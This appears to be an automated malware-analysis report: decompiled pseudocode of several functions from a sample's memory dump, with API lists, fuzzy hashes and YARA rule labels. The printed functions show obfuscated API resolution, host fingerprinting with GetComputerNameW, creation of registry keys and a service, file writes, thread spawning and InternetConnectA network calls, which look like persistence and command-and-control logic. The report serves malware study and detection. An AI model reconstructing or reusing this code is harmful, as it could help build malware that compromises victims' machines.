						_t279 = E00091460(E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)), _v20, 0 | E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c)) == 0x00000000);
						_v20 = _v24 + 0x35e;
						__eflags = E0009EC30(E000AFCF0( &_v112) + _v32 * 2, 0xffffffff, _v20, 0x20) - 1;
						asm("adc esi, 0x0");
						_v20 = _t279;
						_t287 = E000955C0(E0009EC30(E000AFCF0( &_v100) + _v32 * 2, 0xffffffff, _v24 + 0x37e, 0x10), 0);
						_t288 = E00099D50(0x1eac204e);
						_t290 = E00091460(__eflags, _v20 - _t288 + (_t287 & 0x00000001), E00099D50(0x1eac204e));
						E00091460(__eflags, _v20, _t287 & 0x00000001);
						_t368 = _v24;
						_v20 = _t368 + 0x38e;
						_t293 = E000AFCF0( &_v88);
						__eflags = E0009EC30(_t293 + _v32 * 2, 0xffffffff, _v20, E00099D50(0x647400bc)) - 1;
						asm("adc esi, 0x0");
						__eflags = E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1;
						asm("adc esi, 0x0");
						_t299 = E00096BB0(E0009EC30( &_v266, 0xffffffff, _t368 + 0x39e, 0x20) - 1, _t290, 0);
						_t593 = _t535 + 0x240;
						__eflags = _t299 & 0x00000001;
						if((_t299 & 0x00000001) != 0) {
							L14:
							_t350 = 0;
							__eflags = 0;
						} else {
							_t314 = E00099D50(0x647410ac);
							_t499 = E0009D620(_t314, E00099D50(0x6474ff53));
							_t319 = E000920A0(__eflags, _t499,  !(E00099D50(0x6474ff53)));
							E00099D50(0x6474ff53);
							_t321 = E00099D50(0x647410ac);
							_t323 = E0009D620(_t321, E00099D50(0x6474ff53));
							 *(_t368 + 0x1fa) = _t323 << E00099D50(0x647400bc) | _t319 & _t499;
							_t325 = E0009D030(_t324, __eflags, _t368); // executed
							_t604 = _t593 + 0x38;
							__eflags = _t325;
							if(_t325 == 0) {
								goto L14;
							} else {
								_t529 = _a4;
								E000AEDD0( &_v52);
								_t327 = E000AFCF0(_a4);
								_t329 = E0009A5E0(_t327,  &_v76, E00099D50(0x647400ae)); // executed
								_t606 = _t604 + 0x10;
								__eflags = _t329;
								if(_t329 != 0) {
									_t470 = _v72 + _v76;
									__eflags = _v72 + _v76;
									E000AF410(_v76,  &_v52, _v76, _v72 + _v76); // executed
									E000A9C40(__eflags,  &_v76); // executed
									_t606 = _t606 + 4;
								}
								_t447 =  &_v52;
								__eflags = E000AF190( &_v52);
								if(__eflags != 0) {
									_t339 = E000AF190( &_v52);
									_t341 = E000ACB00(__eflags,  &_v248, E000AEE10( &_v52), _t339); // executed
									_t609 = _t606 + 0xc;
									__eflags = _t341;
									if(__eflags != 0) {
										E0009ECC0(_t341,  &_v248, _t470, __eflags); // executed
									}
									_t342 = E000AF190( &_v52);
									_t343 = E000AEE10( &_v52);
									_t447 =  &_v64;
									E000A9600(E000AFCF0( &_v64), __eflags, _t344, _t343, _t342); // executed
									_t606 = _t609 + 0xc; // executed
								}
								E000A04C0(_t447, _t470, __eflags); // executed
								E000A5040(_t447, _t470, __eflags); // executed
								__eflags = E000A6700(__eflags);
								if(__eflags != 0) {
									E0009BF50(__eflags, 0, 0xa0733d4);
									CreateThread(0, 0, E000A5420, E000A7640(E000AFCF0(_t529), 0xffffffff), 0, 0); // executed
								}
								E000AFB40( &_v52); // executed
								_t350 = 1;
							}
						}
						E000AFB20( &_v88);
						E000AFB20( &_v100);
						E000AFB20( &_v112);
						E000AFB20( &_v124);
						E000AFB20( &_v136);
						E000AFB20( &_v148);
						E000AFB20( &_v160);
						E000AFB20( &_v172);
						E000AFB20( &_v184);
						E000AFB20( &_v196);
						E000AFB20( &_v208);
						E000AFB20( &_v220);
						E000AFB20( &_v232);
						E000AFB20( &_v64);
					} else {
						goto L2;
					}
				}
				return _t350;
			}

0x000a4695
0x000a469a
0x000a469d
0x000a469f
0x000a46f4
0x000a46f4
0x000a46a1
0x000a46a3
0x000a46b7
0x000a46bf
0x000a46d8
0x000a46dd
0x000a46e0
0x000a46ee
0x000a46f2
0x000a4700
0x000a4708
0x000a470e
0x000a4716
0x000a4719
0x000a471e
0x000a472b
0x000a4733
0x000a473a
0x000a4747
0x000a474c
0x000a475a
0x000a4774
0x000a4784
0x000a4791
0x000a47a1
0x000a47ae
0x000a47be
0x000a47cb
0x000a47db
0x000a47e8
0x000a47f8
0x000a4805
0x000a4815
0x000a4822
0x000a4832
0x000a483f
0x000a484f
0x000a485c
0x000a486c
0x000a4879
0x000a4886
0x000a4893
0x000a48a0
0x000a48ad
0x000a48ba
0x000a48c7
0x000a48cf
0x000a48d4
0x000a48db
0x000a48e1
0x000a4910
0x000a4918
0x000a4920
0x000a4926
0x000a4928
0x000a4932
0x000a493a
0x000a4947
0x000a4966
0x000a4976
0x000a497e
0x000a4983
0x000a498b
0x000a4994
0x000a49a7
0x000a49af
0x000a49b2
0x000a49b4
0x000a49ba
0x000a49bd
0x000a49d6
0x000a49de
0x000a49e1
0x000a49ea
0x000a49f2
0x000a49f5
0x000a49fd
0x000a4a10
0x000a4a19
0x000a4a20
0x000a4a29
0x000a4a2c
0x000a4a52
0x000a4a54
0x000a4a65
0x000a4a6c
0x000a4a83
0x000a4aa0
0x000a4aaa
0x000a4abf
0x000a4ace
0x000a4ae9
0x000a4aff
0x000a4b19
0x000a4b32
0x000a4b36
0x000a4b39
0x000a4b3f
0x000a4b60
0x000a4b68
0x000a4b71
0x000a4b78
0x000a4b8c
0x000a4ba3
0x000a4bc3
0x000a4bd5
0x000a4bde
0x000a4c02
0x000a4c0b
0x000a4c21
0x000a4c3c
0x000a4c42
0x000a4c45
0x000a4c67
0x000a4c79
0x000a4c99
0x000a4ca5
0x000a4cad
0x000a4cb9
0x000a4cbc
0x000a4ce3
0x000a4cec
0x000a4d03
0x000a4d06
0x000a4d0c
0x000a4d11
0x000a4d14
0x000a4d16
0x000a4ec7
0x000a4ec7
0x000a4ec7
0x000a4d1c
0x000a4d21
0x000a4d42
0x000a4d55
0x000a4d66
0x000a4d73
0x000a4d8c
0x000a4da9
0x000a4db0
0x000a4db5
0x000a4db8
0x000a4dba
0x00000000
0x000a4dc0
0x000a4dc0
0x000a4dc6
0x000a4dcd
0x000a4de7
0x000a4dec
0x000a4def
0x000a4df1
0x000a4dfc
0x000a4dfc
0x000a4e00
0x000a4e06
0x000a4e0b
0x000a4e0b
0x000a4e0e
0x000a4e16
0x000a4e18
0x000a4e1f
0x000a4e36
0x000a4e3b
0x000a4e3e
0x000a4e40
0x000a4e48
0x000a4e48
0x000a4e52
0x000a4e5b
0x000a4e60
0x000a4e6d
0x000a4e72
0x000a4e72
0x000a4e75
0x000a4e7a
0x000a4e84
0x000a4e86
0x000a4e8f
0x000a4eb9
0x000a4eb9
0x000a4ebe
0x000a4ec3
0x000a4ec3
0x000a4dba
0x000a4ecc
0x000a4ed4
0x000a4edc
0x000a4ee4
0x000a4eef
0x000a4efa
0x000a4f05
0x000a4f10
0x000a4f1b
0x000a4f26
0x000a4f31
0x000a4f3c
0x000a4f47
0x000a4f4f
0x00000000
0x00000000
0x00000000
0x000a46f2
0x000a4f60

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 000A46EE

Part of subcall function 000A5180: CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Part of subcall function 000921E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00092210

Part of subcall function 0009A5E0: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620

CreateThread.KERNEL32(00000000,00000000,Function_00015420,00000000,00000000,00000000), ref: 000A4EB9

Part of subcall function 000A9C40: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
Part of subcall function 000A9C40: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Create$CloseDirectoryFileFolderFreeHandlePathThreadVirtual
String ID:
API String ID: 1450970588-0
Opcode ID: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction ID: e26f6a2a927ebc3eb0cd91757af0931e6c7052d795acac1f300664f7a469dd9f
Opcode Fuzzy Hash: e47609c2aa1e07dce6eadc5be58084e30b77ab60383782c6dd544ffad4d732f7
Instruction Fuzzy Hash: AD32D3B5E002096BDF10EBE0DC53FFE7269AB51314F540574F819A72C3EE706A098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A3BC0(intOrPtr __ecx, void* __eflags) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v52;
				char _v86;
				char _v122;
				char _v158;
				char _v196;
				char _v256;
				short _v456;
				char _v574;
				char _v774;
				int _t23;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				char _t33;
				intOrPtr _t36;
				void* _t38;
				void* _t40;
				signed char _t43;
				char* _t53;
				DWORD* _t59;
				void* _t61;
				void* _t62;
				void* _t66;

				_v24 = __ecx;
				_v20 = 0x64;
				E0009BF50(__eflags, 0, 0x6f6e3c7);
				_t62 = _t61 + 8;
				_t59 =  &_v20;
				_t23 = GetComputerNameW( &_v456, _t59); // executed
				_t81 = _t23;
				if(_t23 == 0) {
					E000A7700( &_v456, E00097200(0xb075e,  &_v122), 0xffffffff);
					_t62 = _t62 + 0x14;
				}
				_v20 = E00099D50(0x647400c8);
				_t25 = E00099D50(0x647400a5);
				_t27 = E0009BF50(_t81, _t25, E00099D50(0x6e1cdffb));
				_t66 = _t62 + 0x14;
				_t53 =  &_v774;
				_t28 =  *_t27(_t53, _t59);
				_t82 = _t28;
				if(_t28 == 0) {
					E000A7700(_t53, E00097200(0xb075e,  &_v52), 0xffffffff);
					_t66 = _t66 + 0x14;
				}
				_t30 = E00097200(0xb0a40,  &_v574);
				_t33 = E00095350(_t82, 0x80000002, _t30, E00097200(0xb0500,  &_v196)); // executed
				_v32 = _t33;
				_t36 = E0009E360(E00097200(0xb07b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
				_v28 = _t36;
				_t38 = E00097200(0xb0990,  &_v158);
				_t40 = E000ACC50( &_v32, _t82,  &_v32, 8);
				_push(_t53);
				_push(_t40);
				_t60 = _v24;
				_v20 = E000AD650( &_v456, _v24, 0x65, _t38,  &_v456);
				_t43 = E000955C0(_t42, 0xffffffff);
				if((_t43 & 0x00000001) != 0) {
					return E000A7700(_t60, E00097200(0xb08a0,  &_v86), 0xffffffff);
				}
				return _t43;
			}

0x000a3bcc
0x000a3bcf
0x000a3bdd
0x000a3be2
0x000a3be5
0x000a3bf0
0x000a3bf2
0x000a3bf4
0x000a3c0b
0x000a3c10
0x000a3c10
0x000a3c20
0x000a3c28
0x000a3c41
0x000a3c46
0x000a3c49
0x000a3c51
0x000a3c53
0x000a3c55
0x000a3c6c
0x000a3c71
0x000a3c71
0x000a3c80
0x000a3ca5
0x000a3cad
0x000a3ccb
0x000a3cd3
0x000a3ce2
0x000a3cf2
0x000a3cfa
0x000a3cfb
0x000a3d06
0x000a3d12
0x000a3d18
0x000a3d22
0x00000000
0x000a3d3e
0x000a3d4b

APIs

GetComputerNameW.KERNEL32(?,00000064), ref: 000A3BF0

Strings

d, xrefs: 000A3BCF

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: ComputerName
String ID: d
API String ID: 3545744682-2564639436
Opcode ID: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction ID: 4b4a9cf9320b269edf301113e3bbf16b8a91b567772b7bbc5c29563ce441ba0e
Opcode Fuzzy Hash: d74ed48a5e45c76f814f9f084625e3bcd4a40715cd98bb2d6d30f83ba29f1bf0
Instruction Fuzzy Hash: 7F31C3E3C441187AEB11A7A0AC03DFF766C9B12715F050135FD1CA2283FA21AB188BF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E00095CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E00091490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E0009BF50(_t35, 0, E00099D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E000A0F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E000AECC0(E00099D50(0x647401a8));
						_t16 = E00091490(0, _t27, E000AFCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x000a518c
0x000a518f
0x000a5191
0x000a5194
0x000a519a
0x000a519c
0x000a519e
0x000a51a1
0x000a51b1
0x000a51b6
0x000a51b6
0x000a51b9
0x000a51c9
0x000a51ce
0x000a51d1
0x000a51d3
0x000a51e5
0x000a51ea
0x000a51f0
0x000a51f4
0x000a51f6
0x000a51fa
0x000a5201
0x000a5206
0x000a5206
0x000a521c
0x000a5231
0x00000000
0x000a5236
0x000a51f4
0x000a5243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 000A51F0

Strings

., xrefs: 000A51A1

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: 98b28f1730cafa2b0814f29adbad9fffe3e45810f82169d2cf3611196d2162e0
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: DE1194A5A8031436FB2076D5AC5BFFF766C9F56B55F050024FE087A2C3FAA15A0486E2

Uniqueness

Uniqueness Score: -1.00%

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000A58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t1 =  &_a4; // 0xa37e6
				_t86 = __edx;
				_t69 = __ecx;
				_v17 =  *_t1;
				_t89 = L0009C1E0(0x1c);
				E000AED20(_t30);
				L000AFA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L000AFA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E000A9AC0(_t116, 0xffffffff); // executed
				_t37 = E00094350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E000AFCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E000A7700(_t87, _t38, 0xffffffff);
					_t40 = E0009BF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E00094350(E000A9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E0009BF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E0009A500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E000A7700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E000AD650(E00097200(0xb0840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E0009BF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E000AFCF0(_t90);
							_t52 = E000AFCF0(_t90);
							_t88 = _v24;
							_t53 = _v28(_t88, _t52, _t51, 0xf01ff, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E0009BF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E00099D50(0x647400a5);
							_t56 = E0009BF50(__eflags, _t54, E00099D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E00097200(0xb0c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E0009BA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E00097200(0xb0840,  &_v124);
							_t68 = E00099D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E000AD650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E000A2450(_t119, 0x80000001, _v24, E000AFCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E0009BF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E0009BE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x000a58d0
0x000a58d6
0x000a58d7
0x000a58da
0x000a58dc
0x000a58de
0x000a58ed
0x000a58ef
0x000a58f7
0x000a58fc
0x000a58fc
0x000a5900
0x000a5908
0x000a590d
0x000a591b
0x000a5920
0x000a5923
0x000a5925
0x000a594e
0x000a5950
0x000a5953
0x000a5954
0x000a5955
0x000a5956
0x000a223c
0x000a2241
0x000a2246
0x000a2250
0x000a225f
0x000a2268
0x000a227a
0x000a227f
0x000a2284
0x000a22e4
0x000a22f4
0x000a22f9
0x000a22fe
0x000a2301
0x000a2303
0x000a2309
0x000a230d
0x000a2310
0x000a236f
0x000a2374
0x000a2312
0x000a2331
0x000a2336
0x000a2336
0x000a237e
0x000a2383
0x000a2388
0x000a238b
0x000a2394
0x000a23ba
0x000a23be
0x000a23c1
0x000a23c3
0x000a23ce
0x000a23d3
0x000a23d7
0x000a23d7
0x000a23de
0x000a23f7
0x000a23fc
0x000a2400
0x000a2400
0x000a2286
0x000a2292
0x000a2297
0x000a229a
0x000a229e
0x000a22a1
0x000a233c
0x000a2341
0x000a22a7
0x000a22b0
0x000a22bf
0x000a22c7
0x000a22d1
0x000a22d3
0x000a22d8
0x000a22d8
0x000a2358
0x000a235d
0x000a235d
0x000a240c
0x000a5927
0x000a592e
0x000a5944
0x000a5946
0x000a594d
0x000a594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000A5944

Strings

7, xrefs: 000A58D7

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateThread
String ID: 7
API String ID: 2422867632-2497961398
Opcode ID: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction ID: 7b4959f3ddd8a6a0327100069a87490279bf89a23305e98a9d85f32ef9685855
Opcode Fuzzy Hash: 53359471cf68dd602f82b61dd4ba48720037d418cabb661f57922f2fe40ad8d7
Instruction Fuzzy Hash: DE01F7A6B8425436E92061E93C13FFF7A584B92B75F080075FA5D9A2C3E8416614A2F3

Uniqueness

Uniqueness Score: -1.00%

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000A9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E0009BF50(__eflags, 0, 0xad68947);
				_t8 = E00099D50(0x247400ac);
				_t9 = E00099D50(0x647400ae);
				_t10 = E00099D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E00093660(_t46, E00095080(_t46, 0x48, E00092FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E0009BF50(_t45, 0, E00099D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E000AAE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E0009BF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x000a9606
0x000a960e
0x000a961d
0x000a962c
0x000a963b
0x000a9640
0x000a964f
0x000a9654
0x000a9688
0x000a96b8
0x000a96ee
0x000a96ee
0x000a9656
0x000a9659
0x000a965d
0x000a9684
0x000a9684
0x000a968e
0x000a969e
0x000a96a3
0x000a96a7
0x000a96a9
0x000a96ab
0x000a96b0
0x000a96b5
0x000a96b5
0x00000000
0x000a96ab
0x000a965f
0x000a9662
0x000a9664
0x00000000
0x00000000
0x000a966d
0x000a9672
0x000a967e
0x000a9680
0x000a9682
0x000a968c
0x000a968c
0x00000000
0x000a968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000A964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000A967E

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 5c71efaef33510c642e86e5f8567699476e48a8fd670ed4884abaec6fda91150
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: 0E2196E6A802053AEE1125B46C53FBE31488FA2759F1A0434FE085A283F9929A1856B3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E000AB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E0009BF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0xb0580;
				_t10 = InternetOpenA( !=  ? _t30 : 0xb0580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E00099D50(0x647400bf);
					_t14 = E0009BF50(0, _t12, E00099D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0xb07fc + _t31 * 8)), 0xb0800 + _t31 * 8, 4);
					_t18 = E00091460(0, E000922E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E0009ABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E0009BF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E0009BF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x000ab799
0x000ab7a5
0x000ab7aa
0x000ab7b7
0x000ab7c2
0x000ab7c6
0x000ab87a
0x00000000
0x000ab87a
0x000ab7cc
0x000ab7ce
0x000ab7d0
0x000ab7d5
0x000ab7ee
0x000ab808
0x000ab81f
0x000ab824
0x000ab827
0x000ab829
0x000ab829
0x000ab82e
0x000ab832
0x000ab83c
0x000ab83e
0x000ab840
0x000ab849
0x000ab862
0x000ab866
0x000ab86f
0x000ab878
0x00000000
0x000ab878
0x000ab866
0x000ab880

APIs

InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction ID: a3e35fedb128c82c0eec56d3c8d5161dcb093d70ff9315ceccde59e533e68921
Opcode Fuzzy Hash: c710bd5e375eb3946b5df87314f6134a6c14a58f37a832ce665747257abeea6c
Instruction Fuzzy Hash: 5E21EEB6B4020536FE2066757C23FBF35498B92759F150034FA09A6183FE91EA0155B2

Uniqueness

Uniqueness Score: -1.00%

Function 000921E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000921E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E0009BF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E00095CD0(__eflags, _a4, _a16, _v24, _v28);
						E0009BF50(__eflags, 9, 0x7b43ce7);
						_t25 = E00099D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E0009BF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E0009BF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x000921f6
